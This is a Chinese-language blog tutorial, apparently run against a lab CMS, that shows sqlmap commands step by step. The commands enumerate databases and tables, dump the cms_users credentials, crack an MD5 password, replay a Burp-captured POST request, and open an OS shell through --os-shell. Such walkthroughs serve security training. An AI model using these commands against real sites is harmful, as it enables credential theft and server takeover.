SQLmap使用

文章目录

利用sqlmap 注入得到cms网站后台管理员账密

获取数据库名称

在kali中输入sqlmap命令,打开sqlmap,然后输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs --batch

结果如下:

获取cms数据库的表名

输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs -D "cms" --tables --batch

结果如下:

得到cms中的所有表名

获取users表中的字段(内容)

输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" --columns --batch

结果如下,users表中有三个字段:

获取username字段和password字段的内容

即获取账号密码,输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" -C "username,password" --dump

在弹出的两次交互信息中输入n,得到账号和md5密码密文:

口算md5密文(其实是用工具解密),得到用户名和密码:

admin

123456

salmap破解psot请求数据包

在后台网页用火狐代理、bp抓包,在http history中查看抓到的数据包,将抓到的post请求包复制

输入下面命令,在tmp目录下新建一个txt文件并用vim编辑器编辑,将post数据包的内容放入txt文件中:

复制代码
touch /tmp/post.txt

vim /tmp/post.txt

命令模式下保存退出

输入下面命令破解post请求包:

复制代码
salmap -r /tmp/post.txt

在交互式命令时回车,是否追踪302输入no:

耐心等待完成,显示了两种注入方法,报错注入和布尔盲注:

爆破密码:

复制代码
sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump

爆破成功:

salmap获取getshell

在kali控制台输入下面命令:

复制代码
sqlmap -u "http://10.9.75.33/cms/show.php?id=33" --os-shell

选择语言:

选择路径,2是自选路径,选择2:

路径填:

复制代码
c:/phpstudy/www/

获取成功:

相关推荐
一名优秀的码农5 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp5 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp5 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人5 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp5 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0075 天前
渗透测试_漏洞利用
网络安全
啥都想学点5 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ5 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏5 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk5 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全